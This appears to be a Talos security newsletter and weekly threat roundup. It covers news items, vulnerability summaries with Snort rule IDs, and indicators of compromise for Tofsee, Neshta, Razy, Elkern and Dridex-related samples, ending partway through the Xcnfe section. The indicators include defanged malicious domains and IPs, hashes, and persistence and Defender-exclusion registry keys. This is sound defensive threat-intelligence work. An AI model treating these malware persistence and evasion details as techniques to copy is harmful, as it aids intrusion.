                  • Attackers behind a series of ransomware campaigns targeting more than 20 Texas cities are asking for a combined extortion payment of $2.5 million. One of the towns’ mayors say they will not give into the attackers’ demands. 
                  • This recent wave of ransomware attacks has cities across the U.S. bracing for similar attempts on their systems.  
                  • Controversial data-collection and surveillance company Palantir renewed its contract with U.S. Immigration and Customs Enforcement. The roughly $50 million contract will provide software to ICE used to manage, secure and analyze data, mainly used to identify individuals as they attempt to enter the U.S.  
                  • Security researchers discovered a new type of attack on Bluetooth devices called “KNOB.” If exploited successfully, this vulnerability could allow attackers to spy on the data being shared between two devices via Bluetooth, even if they’ve been paired previously.  
                  • Instagram expanded its bug bounty program to reward researchers who discover third-party apps that steal users’ login information. The program also covers apps that help users get bot followers and produce likes and comments on their posts. 
                  • Bernie Sanders is the first 2020 presidential candidate to formally reject law enforcement agencies’ use of facial recognition technology. Sanders called it “the latest example of Orwellian technology that violates our privacy and civil liberties under the guise of public safety” as part of his formal proposal to overhaul the criminal justice system. 
                  • Twitter banned state-run news agencies from purchasing ads on the platform. The new policy comes after a Chinese news organization ran ads condemning the recent protests in Hong Kong. 
                  • Movie ticket subscription service MoviePass exposed thousands of customers’ MoviePass card and credit card numbers. The company left a critical server unprotected without a password and was found at one point to contain 161 million records. 

                  Notable recent security issues

                  Title: Nest Cam IQ camera open to takeover, data disclosure
                  Description: Cisco Talos recently discovered multiple vulnerabilities in the Nest Cam IQ Indoor camera. One of Nest Labs’ most advanced internet-of-things devices, the Nest Cam IQ Indoor integrates Security-Enhanced Linux in Android, Google Assistant, and even facial recognition all into a compact security camera. It primarily uses the Weave protocol for setup and initial communications with other Nest devices over TCP, UDP, Bluetooth and 6lowpan. Most of these vulnerabilities lie in the weave binary of the camera, however, there are some that also apply to the weave-tool binary. It is important to note that while the weave-tool binary also lives on the camera and is vulnerable, it is not normally exploitable as it requires a local attack vector (i.e. an attacker-controlled file) and the vulnerable commands are never directly run by the camera.
                  Snort SIDs: 49843 - 49855, 49797, 49798, 49801 - 49804, 49856, 49857, 49813 - 49816, 49912 (Written by Josh Williams)

                  Title: Aspose APIs contain bugs that could lead to remote code execution
                  Description: Cisco Talos recently discovered multiple remote code execution vulnerabilities in various Aspose APIs. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs, Microsoft Word files and more. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API.
                  Snort SIDs: 49756, 49757, 49760, 49761, 49852, 49853 (Written by Cisco Talos analysts)

                  Most prevalent malware files this week

                  SHA 256: b22eaa5c51f0128d5e63a67ddf44285010c05717e421142a3e59bba82ba1325a  
                  MD5: 125ef5dc3115bda09d2cef1c50869205
                  Typical Filename: helpermcp
                  Claimed Product: N/A
                  Detection Name: PUA.Osx.Trojan.Amcleaner::sbmt.talos  

                  SHA 256: 8c0b271744bf654ea3538c6b92aa7bb9819de3722640796234e243efc077e2b6
                  MD5: f7145b132e23e3a55d2269a008395034  
                  Typical Filename: 8c0b271744bf654ea3538c6b92aa7bb9819de3722640796234e243efc077e2b6.bin
                  Claimed Product: N/A
                  Detection Name: Unix.Exploit.Lotoor::other.talos

                  SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510  
                  MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                  Typical Filename: xme64-2141.exe
                  Claimed Product: N/A
                  Detection Name: W32.7ACF71AFA8-95.SBX.TG

                  SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f  
                  MD5: e2ea315d9a83e7577053f52c974f6a5a
                  Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin
                  Claimed Product: N/A
                  Detection Name: W32.AgentWDCR:Gen.21gn.1201

                  SHA 256:46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08  
                  MD5: db69eaaea4d49703f161c81e6fdd036f
                  Typical Filename: invoice.exe
                  Claimed Product: N/A
                  Detection Name: W32.46B241E3D3-95.SBX.TG 

                  Threat Roundup for August 16 to August 23

                  $
                  0
                  0
                  Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 16 and Aug. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                  As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                  For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
                  The most prevalent threats highlighted in this roundup are:

                  Threat NameTypeDescription
                  Win.Trojan.Tofsee-7131053-0 Trojan Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
                  Win.Virus.Neshta-7131041-0 Virus Neshta is file-infecting malware that also collects sensitive information from an infected machine and sends it to a C2 server.
                  Win.Trojan.Razy-7124013-0 Trojan Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
                  Win.Malware.Elkern-7118026-1 Malware Elkern is a worm that spreads via peer-to-peer networks by masquerading as popular movies, games, or software. Once executed, it installs follow-on malware onto the system.
                  Win.Packed.Xcnfe-7131484-0 Packed This cluster provides generic detection for the Dridex banking trojan that's downloaded onto a target's machine.
                  Win.Worm.Vobfus-7123957-0 Worm Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its C2 server.

                  Threat Breakdown

                  Win.Trojan.Tofsee-7131053-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config1
                  28
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config3
                  28
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES 28
                  REGISTRY\USER\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config0
                  28
                  REGISTRY\USER\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config1
                  28
                  REGISTRY\USER\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config2
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: Type
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: Start
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: ErrorControl
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: DisplayName
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: WOW64
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: ObjectName
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: Description
                  28
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\fymsrzfu
                  5
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\buionvbq
                  4
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\slzfemsh
                  2
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\yrflksyn
                  2
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\dwkqpxds
                  2
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\athnmuap
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\kdrxwekz
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\wpdjiqwl
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\tmagfnti
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\zsgmltzo
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\lesyxfla
                  1
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  239[.]255[.]255[.]25028
                  69[.]55[.]5[.]25028
                  46[.]4[.]52[.]10928
                  176[.]111[.]49[.]4328
                  85[.]25[.]119[.]2528
                  144[.]76[.]199[.]228
                  144[.]76[.]199[.]4328
                  43[.]231[.]4[.]728
                  192[.]0[.]47[.]5928
                  95[.]181[.]178[.]1728
                  211[.]231[.]108[.]4725
                  64[.]233[.]186[.]2725
                  172[.]217[.]197[.]2725
                  98[.]136[.]96[.]7425
                  172[.]217[.]5[.]22824
                  67[.]195[.]228[.]11023
                  173[.]194[.]66[.]2723
                  209[.]85[.]203[.]2723
                  207[.]69[.]189[.]22922
                  98[.]137[.]157[.]4322
                  213[.]205[.]33[.]6322
                  98[.]136[.]96[.]7722
                  23[.]160[.]0[.]10821
                  98[.]136[.]96[.]7321
                  188[.]125[.]72[.]7321
                  *See JSON for more IOCs
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  250[.]5[.]55[.]69[.]in-addr[.]arpa28
                  250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org28
                  250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org28
                  250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net28
                  whois[.]iana[.]org28
                  250[.]5[.]55[.]69[.]bl[.]spamcop[.]net28
                  whois[.]arin[.]net28
                  eur[.]olc[.]protection[.]outlook[.]com28
                  250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org28
                  microsoft-com[.]mail[.]protection[.]outlook[.]com28
                  honeypus[.]rusladies[.]cn28
                  marina99[.]ruladies[.]cn28
                  sexual-pattern3[.]com28
                  coolsex-finders5[.]com28
                  mta5[.]am0[.]yahoodns[.]net27
                  smtp[.]secureserver[.]net25
                  mx-eu[.]mail[.]am0[.]yahoodns[.]net25
                  mx-aol[.]mail[.]gm0[.]yahoodns[.]net25
                  mx1[.]emailsrvr[.]com25
                  hotmail-com[.]olc[.]protection[.]outlook[.]com25
                  hotmail[.]de24
                  mx1[.]hanmail[.]net24
                  hanmail[.]net23
                  mx6[.]earthlink[.]net22
                  msx-smtp-mx1[.]hinet[.]net22
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  %SystemRoot%\SysWOW64\config\systemprofile28
                  %SystemRoot%\SysWOW64\config\systemprofile:.repos28
                  %TEMP%\<random, matching '[a-z]{8}'>.exe28
                  %SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>28
                  %System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)5
                  %TEMP%\utjfmin.exe1
                  %TEMP%\jiyubxc.exe1
                  %TEMP%\dcsovrw.exe1
                  %TEMP%\rqgcjfk.exe1

                  File Hashes

                  0009a9ca6636ab37f4c3f21f19741971f5900ae4b18381e7695962a4d4e6f811 013bec317dbcead53cdedaa23feb802e1f2b4e74e016cdff7e39490d22adab30 015ad805d24234339ca8e9f1402c7bcaa1493cefb13f61f3442873fd8f31df97 04d5f2b852d6e9602612ed5b58becccd1eff5e0a8d53671bb3a2209a36ad4a79 059bbb4be73dd7b7055687f9ae779598b2327d61f49b2367ac129685577c8e8b 080b33f9d842b08d082b40f3c49ab9b6727ae47ad154e7c65ee45775d6750693 1348df977c70b9b0ff8cf904c4bd96cbcd58aa332db5c448a63259a1cc7909b2 13e5a8542f77eb807e805cf136d489350d2976af8164c4e9b5daeacdefb4b0f9 16befc710825960d79ccb4f7a2ed12a399e7c4d457e11d141163882e6c6d246e 187746b5d8d8627e46781d34167c08a018ad8a31d2f50033d723d3244c7aad41 1c5da4a767bf010a4eb2ffa39b939f65c21a1dad6b2c40de8fe71db6b5cefab9 1cf13ba4a00fc7dbb79d2e47c2a56c35518494652989cb1a5e932ec676019bb6 1e3f0775aa3feea8393b3073e34fbb0b00b1306cce374fbef5018d7d79a8f556 269b04eaee60cae3fe4428292be87a81561ea94a4a0df7cab400b15411566415 27681e2fb23e38cfcd21dd751d79ac47a866655ae259131e05566ad1be8611e0 280d20ee6383ebe642253f076e194831c53396f9e7d33567054411cd6b167a50 288084927b8287de4320b026474cfcf01270bc2eb63f40cad82a2a95be4acab0 28b7e0c90f7664f834f7adbee912f1f1efc769132d419b16572cbeeba5c6d724 29100329861dd3e48acc75d9ccb0faaf852e44158538db71ccc569df5e84507e 2996e60bf4ef30b47ddb32ee6ea23603bc266562913be0add727791bd2261234 29f84ea78abaf727817f2d2126ccbec9554ec32550897e28e20dd6ac3f9a038e 2b77064e3de89e494664d588ea3c1fd3f7d3863babbc919769d13187250c395c 2ce0b071b4465e9e383c3ce3df2d100cf5e7cc96a12b25e861e7d88d4be77cdf 2ec24ae1e990a9abadb6d5393089a39c4c570d5f138c3651a66daf336b519598 31fb8cfa6e434122f5a2817d33a2d509f0adc23577771d11ab9ad7682ed7bd41
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Win.Virus.Neshta-7131041-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\CLASSES\EXEFILE\SHELL\OPEN\COMMAND 11
                  MutexesOccurrences
                  MutexPolesskayaGlush*.*svchost.comexefile\shell\open\command‹À "%1" %*œ‘@11
                  Files and or directories createdOccurrences
                  \MSOCache\ALLUSE~1\{90140~1\DW20.EXE11
                  \MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe11
                  \MSOCache\ALLUSE~1\{91140~1\ose.exe11
                  \MSOCache\ALLUSE~1\{91140~1\setup.exe11
                  %TEMP%\tmp5023.tmp11
                  %SystemRoot%\svchost.com11
                  %HOMEPATH%\APPLIC~1\Adobe\Reader\9.2\ARM\ARMUPD~1\AdobeARM.exe11
                  %HOMEPATH%\APPLIC~1\Adobe\Reader\9.2\ARM\ARMUPD~1\READER~1.EXE11
                  %HOMEPATH%\APPLIC~1\Adobe\Setup\{AC76B~1\Setup.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000050.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000053.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000059.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000060.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000066.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000067.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000070.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000071.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000074.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000073.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000114.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000115.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000116.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000118.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000119.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000120.exe11
                  *See JSON for more IOCs

                  File Hashes

                  23e9f0d6be0f5ba18e787052e64fb7ec62410fab4ec8a3b5f11ec58e34dcf4d7 28996ba8b6dc0794260721cb26bbdc207b23af9352234f5eee0c61851c4a3811 397b969c83ad2e1c6efdb492e932ff8a111f0b1cab34f1409d1888784ad9ca6a 5a3535e2815f02762483cdd97b060cac4ec220e28f21ac42d332fc6281a2709e 63e9b564538a88cb7d06e75114ff1e3fc1cf07b973d5c2e74b114361699ba298 793529a8214ced18d6c43239ddc99b60b6cd3ac5055667e4c5878d65c4c24af7 88d1b872c821bd52be9f52677626b319307a316e9218547a66fb9c6597233aa0 9a8af062b9581de41c2fc10673a5760af539f0ad28b94b81bc5bfa4665ea843d ad15b25e0356c98ca1679abcf41d12ab2a3869f0e7aad18d169c72af55bcb502 f988cbba1b43f688839a203e0916e3e11861df7581c4fc770ead93a63f584c44 fd5476414674ca6a58296181ce38fe772ed7c76cd9cfe026b19e194da43787b0

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Trojan.Razy-7124013-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SECDESC 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SID 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\PRIVILGS 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SECDESC 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SID 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\PRIVILGS 32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO
                  Value Name: pool_url
                  32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO
                  Value Name: pool_pass
                  32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Start Windows
                  32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO 32
                  <HKLM>\SECURITY\RXACT
                  Value Name: Log
                  32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO
                  Value Name: pool_user
                  32
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  94[.]100[.]186[.]11932
                  217[.]69[.]128[.]9932
                  88[.]99[.]142[.]16314
                  136[.]243[.]102[.]16712
                  94[.]130[.]143[.]16211
                  136[.]243[.]102[.]15410
                  78[.]46[.]49[.]2126
                  94[.]130[.]9[.]1946
                  136[.]243[.]88[.]1456
                  136[.]243[.]94[.]276
                  94[.]130[.]64[.]2255
                  136[.]243[.]102[.]1575
                  46[.]4[.]119[.]2085
                  176[.]9[.]147[.]1785
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  xmr[.]pool[.]minergate[.]com32
                  cloclo11[.]datacloudmail[.]ru32
                  cloclo16[.]datacloudmail[.]ru32
                  Files and or directories createdOccurrences
                  %APPDATA%\Lopatka\app.exe32
                  %APPDATA%\Lopatka\config.json32
                  %APPDATA%\Lopatka32
                  %System32%\config\SECURITY6
                  %System32%\config\SECURITY.LOG16

                  File Hashes

                  0137fc231e2d7e412a4e4ebbb670e732e47264034f9ec2493ecbd8000c2eb499 02ab00e9a675adb7b0fb711ba04f29abffe9774d9a79a12cde4041dd1ec81b0d 07ae413be994ec96a7d3e8202cf8917b8635bde5e3f4176dcd218d6cd713db72 088b3da558e94be8b010002638a54ad34edcc5e2557cad98ab0adbfff7ee887b 0bec1af49840202e3f08ee153839630bc15ca00be3c59947d3f34de189b33e43 0c44e2c58e9940b3fc9f2266fcf797e574a24dcf109e136703c37f6b3d0831e5 0c5ea4b44180db65a8833e4808abd600f4ddd2f1f637adf7f89c131aa0cfecff 0cee3e0769dd885c12ac6a214a85275a59bd98937e72e3d03847cfb6f257bd56 0f2b46d1ef3003c93ebddeb87f66e2fe64e338ed36ec868710367e112c36e495 1182ef3ba1044b9341ece945425ed1274e085f374fbbc48917a069de87e53fcc 11e9f442c1f1542f820ffbf23872bafbcfc8fdd2571ac29db34725cee402f3ef 128b0e52a319a8176898acb8561831a6287719202ad4f94dc94fd100ac582335 13b5035f6c4dbcd1a00b2868db39f95cae92b67457e07a208e5eb881d647d132 1839a13f2080086beefa122c5d855580d74059c5d6aba3e1c9759c1e851d092c 184ad59d217ed9d9564436c2f547dfda36250aebf2c29c1350263e506a241aec 1a4426dba7c2baffb9f678acd282e836c8701e497814f95d0c3fe8282e7f0235 1a8c8b017edebaf6f249bda6e91daaecb2b1e2dcbf37b72d5b23bad128fedd3a 1bf6eb53191201bbb8e6281fa417178e1a789f8435b30cf7366cf6bd8fdc3c43 20580370ad7f348ca8709df2da855bdfa2c779a25165b44ced3da6fc70c22d41 21198bdc5acdabc431021f78c6e983e56437b84287e1473431033bc86ba2dca1 2198063b30b7d7195fb574d56571c4f2a699100e34e7d731966fb6c9fc5e90a2 219bdf6c224824fbca243df963f5bb5c6253b56d72c7a2ccdba1af2d2b836172 2573687a28ed782e1df1d2473801c02880a893ef4ee3b2f9664740391818bdee 2d9eec16b891d142303841369dc5b353c2842f3bb623eeee706c7bb316d2bd04 37444d1e21872ad1aca34d764d217dd8ef53c2e199d9c90e296a13535cf06d51
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Malware.Elkern-7118026-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\WOW6432NODE\HP710C 32
                  Files and or directories createdOccurrences
                  %SystemRoot%\Temp\AIM Account Stealer Downloader.exe32
                  %SystemRoot%\Temp\AikaQuest3Hentai FullDownloader.exe32
                  %SystemRoot%\Temp\Battle.net key generator (WORKS!!).exe32
                  %SystemRoot%\Temp\Borland Delphi 6 Key Generator.exe32
                  %SystemRoot%\Temp\Britney spears nude.exe32
                  %SystemRoot%\Temp\CKY3 - Bam Margera World Industries Alien Workshop Full Downloader.exe32
                  %SystemRoot%\Temp\Cat Attacks Child Full Downloader.exe32
                  %SystemRoot%\Temp\DSL Modem Uncapper.exe32
                  %SystemRoot%\Temp\DivX.exe32
                  %SystemRoot%\Temp\GTA3 crack.exe32
                  %SystemRoot%\Temp\Gladiator FullDownloader.exe32
                  %SystemRoot%\Temp\Grand theft auto 3 CD1 crack.exe32
                  %SystemRoot%\Temp\Hack into any computer!!.exe32
                  %SystemRoot%\Temp\Hacking Tool Collection.exe32
                  %SystemRoot%\Temp\Half-life ONLINE key generator.exe32
                  %SystemRoot%\Temp\Half-life WON key generator.exe32
                  %SystemRoot%\Temp\How To Hack Websites.exe32
                  %SystemRoot%\Temp\Internet and Computer Speed Booster.exe32
                  %SystemRoot%\Temp\Jenna Jameson - Built For Speed Downloader.exe32
                  %SystemRoot%\Temp\KaZaA media desktop v2.0 UNOFFICIAL.exe32
                  %SystemRoot%\Temp\Key generator for all windows XP versions.exe32
                  %SystemRoot%\Temp\LordOfTheRings-FullDownloader.exe32
                  %SystemRoot%\Temp\MSN Password Hacker and Stealer.exe32
                  %SystemRoot%\Temp\Macromedia Flash 5.0 Full Downloader.exe32
                  %SystemRoot%\Temp\Macromedia key generator (all products).exe32
                  *See JSON for more IOCs

                  File Hashes

                  0b68f9af51bbf81c844c2918b585affdd9dd718b2947a561184773f67aeb1f6a 278cad9a78dbad1143db49335eb14979ea4d0ee92c57d2ee2d609174e64a9410 3de7e6becb18bcbc7b296570bedcde5298573aa173ab5b171e074837388e9009 4130a0b119e9ec6d19778832e4c46735be0dd0db1416804c3e812955422eb7aa 41e91ae33451c66142cd5a9a311eaf486a3120e6e5791b092ba0d6c5369488b5 44a2fe971055187936edd220bfd39b53d4a861f87dc26f571919b84ab97ee082 47e52b8ac3c6ff8f2dca34ad0956546c2bf6fa0402b284f2abcf68518a231c6c 4daf6f6578dd52f8622126e6aa602a34126971b27f8b3057fca64af77dcee47d 4ef1228ae3c74f4302f6e6310a76d2a927dcd3df449f0fd507447a0aba24f6e6 51c932a3be3232c21ad7c85b3a42bd69ac8c94b871d2d5ce71b5c7975c74bebb 53beca3b6a9f89775a63e5ac5cfc9bf19ec4ae0ef7610083c1d695fdcc1d3ccc 5ef82482de74c3c76c6ae5e84ed81a90467f2c893e9bdfbe15e0288629ed4bba 6074a512cdd562abd6b565d3d52b0623b699d1ae395fc5b636f287451d4b7d9b 60799126289b3b6cb6cc72c24c3dbfc047646915444ebe11c47be9153ae010a1 6a1421414241c9055b19ed82ff7017b867ec30d7dd958187d1c43470878b964c 6b7a03e862e6c5cf1a14ca0266fd6ab0dbc1919e7d3e8359929f48de3284bb57 6fbf4d256e79f5a00166750204384a7c0dbec8e506ed70e133f9661844563318 7dbcdde4d690e346735b7e282ae64e6f3c82ecf292aec7cf5936e1364d850293 7dc3a586bf6d1addc417169f1522f227cc546d49b3ff722bae8589380962a0fa 82855b7292f0db3a431b4aedf1b03ea39b043082ac31254bdc8201b4a597cf9b 8722a40d49f8dc67c85d9bf38e6a0c09f87141b1f1432a265e3bb465323ec196 890c5dd6a7ba3d245633fc9cc0ddc3710c4fbfbc2272889556b99e8e80fdf63d 9a5ae6f06d4db89fcb05f0aa434cabf8ca40c61523896a97ace25e86986bdcce 9e7a30c7ced797c5e329022a1557e2164bf790420ce08320c0b20cdc78937ad6 9e97a9bfb0e8e9b082f3c79146e3f34e2098de7404af807f6d90a62d48ff7e2e
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Packed.Xcnfe-7131484-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: trkcore
                  26
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                  Value Name: DisableTaskMgr
                  26
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
                  Value Name: CheckSetting
                  22
                  MutexesOccurrences
                  mxPWjmqQ8n1
                  tx0w71lvCy1
                  6exxyHtr5d1
                  G2HYsj3fFg1
                  JerlUkOuKL1
                  MiIl5jaHeB1
                  OaqotdMe7M1
                  SCmfJWJkxg1
                  UzS0XAm1fS1
                  dG6tI9ut6B1
                  3t5z9ncR4g1
                  Fnbk52Waor1
                  R6AEP2O20C1
                  UAZKOAGGs21
                  k9oOrGi0aX1
                  l5nsV9SyRF1
                  pyka6wxPfy1
                  xmZSk4nyco1
                  ATgpy0BqxR1
                  NnWRFLviWv1
                  Qjy3zaZyv91
                  agtFwXTy1f1
                  jReSCvTbxM1
                  jxvaMsSvTQ1
                  myY0J7QVPE1
                  *See JSON for more IOCs
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  172[.]217[.]10[.]7825
                  104[.]20[.]208[.]2114
                  104[.]20[.]209[.]2112
                  172[.]217[.]6[.]2061
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  pastebin[.]com26
                  www[.]ga1n8pm45j[.]com1
                  www[.]htoc9fu6lz[.]com1
                  www[.]d5spcpq7ma[.]com1
                  www[.]x9imtredft[.]com1
